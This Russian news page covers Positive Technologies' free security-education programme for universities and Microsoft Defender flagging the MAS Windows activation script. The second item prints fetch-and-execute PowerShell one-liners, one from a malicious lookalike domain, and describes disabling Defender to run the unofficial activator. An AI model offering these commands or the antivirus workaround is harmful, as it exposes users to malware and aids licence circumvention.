PT предоставит вузам два новых продукта и поддержит дипломников

PT предоставит вузам два новых продукта и поддержит дипломников

PT предоставит вузам два новых продукта и поддержит дипломников

Компания Positive Technologies обновила некоммерческую образовательную программу Positive Education. В программе Positive Education участвует уже 91 высшее учебное заведение России. Основная ее задача — помогать студентам, желающим получить знания в области практической информационной безопасности.

Positive Technologies бесплатно предоставит вузам два новых продукта, свежие методические материалы, практические работы с разбором реальных инцидентов. Кроме того, исследовательский центр компании поддержит студентов и аспирантов, работающими над дипломными и научными работами в области ИБ. 

«В информационной безопасности дефицит кадров ощущается даже острее, нежели в смежных областях ИТ, — отмечает заместитель директора по обучению и сертификации Positive Technologies Михаил Савельев. — По разным оценкам, сейчас в мире есть потребность в 1—1,5 млн таких специалистов. Но готов ли вчерашний студент защищать ИТ-систему предприятия? К сожалению, на практике основной багаж знаний, полученных в вузе, часто остается невостребованным. Новые угрозы и технологии защиты появляются очень быстро, а учебные пособия и оборудование в вузах устаревают. Наша цель — максимально сократить этот разрыв».

С 2017 года вузы смогут бесплатно установить и использовать как в защитных, так и в обучающих целях межсетевой экран прикладного уровня PT Application Firewall, предназначенный для защиты корпоративных веб-порталов. Первый российский продукт класса Web Application Firewall (WAF), признанный аналитиками Gartner, позволит студентам изучать различные вектора атак на веб-приложения и практические способы защиты онлайн-инфраструктуры. Данная система успешно работает в таких компаниях, как «Мегафон» и «Связной», а на Олимпиаде-2014 обеспечивала безопасность интернет-порталов ВГТРК.

Учебные заведения смогут также бесплатно устанавливать MaxPatrol SIEM для получения навыков выявления инцидентов информационной безопасности в крупных IT-инфраструктурах. Слушатели узнают, как обеспечить сбор и анализ информации обо всех активах и событиях в ИТ-инфраструктуре в режиме реального времени, автоматически генерировать правила корреляции, работать с инцидентами на самых ранних стадиях и принимать превентивные меры для защиты.

Как и раньше, Positive Technologies предоставляет вузам систему контроля защищенности и соответствия стандартам MaxPatrol 8 и популярный сканер уязвимостей XSpider. Традиционно продукты будут поставляться вместе с обучающими материалами, которые помогут интегрировать системы в образовательный процесс. Positive Technologies оказывает методическую помощь во внедрении всех компонентов в образовательный процесс, предоставляет техническую поддержку и обновления для своих продуктов, а также демостенды, эмулирующие типовые информационные системы.

Помимо этого, в рамках Positive Education будет проходить серия бесплатных вебинаров по актуальным вопросам информационной безопасности, а также лабораторные практикумы по инструментальному анализу защищенности, тестированию на проникновение, анализу безопасности веб-приложений и анализу защищенности ДБО.

«Изучать что-либо лишь в теории скучно. В Positive Technologies ежегодно проводятся масштабные исследования безопасности телекоммуникационных сетей, IoT, АСУ ТП, банкоматов, и прочих, самых разнообразных систем и инфраструктур. Мы знаем главные проблемы критически важных активов и готовы поделиться наиболее острыми темы для дипломных работ студентов и исследований аспирантов. Сейчас мы также работаем над тем, чтобы по результатам обучения студенты смогли получить сертификаты специалистов в области защиты информации, и тестируем практику стажировки студентов и курирования их дипломных работ экспертами компании», — говорит Михаил Савельев.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru